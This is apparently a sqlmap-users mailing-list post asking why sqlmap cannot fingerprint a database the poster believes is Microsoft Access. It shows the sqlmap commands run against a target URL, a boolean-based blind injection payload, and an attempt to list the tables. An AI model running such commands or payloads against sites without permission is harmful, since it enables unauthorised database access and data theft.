[sqlmap-users] Could not detect MS database injection

[Volker N. <vol...@rw...>]

Hi,

I am using sqlmap to scan a specific GET parameter of a target site. I know there is a SQL injection in parameter 2:

python sqlmap.py -u "http://example.net/de/de*/site" --batch

sqlmap gives me the following result:

> …
> [16:36:19] [INFO] heuristic test shows that URI parameter '#1*' might be injectable (possible DBMS: Microsoft Access)
> [16:36:19] [INFO] testing for SQL injection on URI parameter '#1*'
> [16:36:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
> [16:36:29] [INFO] URI parameter '#1*' is 'AND boolean-based blind - WHERE or HAVING clause' injectable 
> [16:36:29] [INFO] parsed error message(s) showed that the back-end DBMS could be Microsoft Access. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
> [16:36:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
> [16:36:29] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
> [16:37:05] [INFO] checking if the injection point on URI parameter '#1*' is a false positive
> [16:37:11] [INFO] URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
> sqlmap identified the following injection points with a total of 34 HTTP(s) requests:
> ---
> Place: URI
> Parameter: #1*
>     Type: boolean-based blind
>     Title: AND boolean-based blind - WHERE or HAVING clause
>     Payload: http://example.net:80/de/de' AND 9199=9199 AND 'tyFW'='tyFW/site
> ---
> [16:37:11] [INFO] testing Microsoft Access
> [16:37:13] [INFO] confirming Microsoft Access
> [16:37:14] [WARNING] the back-end DBMS is not Microsoft Access
> [16:37:14] [INFO] testing MySQL
> [16:37:16] [WARNING] the back-end DBMS is not MySQL
> [16:37:16] [INFO] testing Oracle
> [16:37:17] [WARNING] the back-end DBMS is not Oracle
> [16:37:17] [INFO] testing PostgreSQL
> [16:37:18] [WARNING] the back-end DBMS is not PostgreSQL
> [16:37:18] [INFO] testing Microsoft SQL Server
> [16:37:19] [WARNING] the back-end DBMS is not Microsoft SQL Server
> [16:37:19] [INFO] testing SQLite
> [16:37:20] [WARNING] the back-end DBMS is not SQLite
> [16:37:20] [INFO] testing Firebird
> [16:37:21] [WARNING] the back-end DBMS is not Firebird
> [16:37:21] [INFO] testing SAP MaxDB
> [16:37:22] [WARNING] the back-end DBMS is not SAP MaxDB
> [16:37:22] [INFO] testing Sybase
> [16:37:23] [WARNING] the back-end DBMS is not Sybase
> [16:37:23] [INFO] testing IBM DB2
> [16:37:24] [WARNING] the back-end DBMS is not IBM DB2
> [16:37:24] [CRITICAL] sqlmap was not able to fingerprint the back-end database management system, but from the HTML error page it was possible to determinate that the back-end DBMS is Microsoft Access. Do not specify the back-end DBMS manually, sqlmap will fingerprint the DBMS for you
> [16:37:24] [WARNING] HTTP error codes detected during testing:
> 400 (Bad Request) - 24 times, 500 (Internal Server Error) - 20 times
> 
> [*] shutting down at 16:37:24

I am confused at this point: Is sqlmap thinking that the DBMS is MS Access or not?
When I manually try following URL in my browser "http://example.net/de/de'/site" I get a 500 HTML-page with output "Microsoft JET Database Engine Error …" so I would say the DBMS is MS Access.
When I now try to get for example all tables, then following happens:

> python sqlmap.py -u "example.net/de/de*/site" --batch --tables
> 
>     sqlmap/1.0-dev-0664e72 - automatic SQL injection and database takeover tool
>     http://sqlmap.org
> 
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
> 
> [*] starting at 16:38:02
> 
> [16:38:05] [INFO] custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
> [16:38:05] [INFO] testing connection to the target url
> sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
> ---
> Place: URI
> Parameter: #1*
>     Type: boolean-based blind
>     Title: AND boolean-based blind - WHERE or HAVING clause
>     Payload: http://example.net:80/de/de' AND 9199=9199 AND 'tyFW'='tyFW/site
> ---
> [16:38:07] [INFO] testing MySQL
> [16:38:08] [INFO] heuristics detected web page charset 'ascii'
> [16:38:08] [WARNING] the back-end DBMS is not MySQL
> [16:38:08] [INFO] testing Oracle
> [16:38:09] [INFO] heuristics detected web page charset 'ISO-8859-2'
> [16:38:09] [WARNING] the back-end DBMS is not Oracle
> [16:38:09] [INFO] testing PostgreSQL
> [16:38:10] [WARNING] reflective value(s) found and filtering out
> [16:38:10] [WARNING] the back-end DBMS is not PostgreSQL
> [16:38:10] [INFO] testing Microsoft SQL Server
> [16:38:11] [WARNING] the back-end DBMS is not Microsoft SQL Server
> [16:38:11] [INFO] testing SQLite
> [16:38:12] [WARNING] the back-end DBMS is not SQLite
> [16:38:12] [INFO] testing Microsoft Access
> [16:38:12] [INFO] confirming Microsoft Access
> [16:38:13] [WARNING] the back-end DBMS is not Microsoft Access
> [16:38:13] [INFO] testing Firebird
> [16:38:14] [WARNING] the back-end DBMS is not Firebird
> [16:38:14] [INFO] testing SAP MaxDB
> [16:38:15] [WARNING] the back-end DBMS is not SAP MaxDB
> [16:38:15] [INFO] testing Sybase
> [16:38:16] [WARNING] the back-end DBMS is not Sybase
> [16:38:16] [INFO] testing IBM DB2
> [16:38:17] [WARNING] the back-end DBMS is not IBM DB2
> [16:38:17] [CRITICAL] sqlmap was not able to fingerprint the back-end database management system. Support for this DBMS will be implemented at some point
> [16:38:17] [WARNING] HTTP error codes detected during testing:
> 400 (Bad Request) - 1 times, 500 (Internal Server Error) - 9 times
> 
> [*] shutting down at 16:38:17

Even when i try to use --text-only or --not-string switches I am not able to receive the tables. Any ideas?


Best regards

Volker Nebelung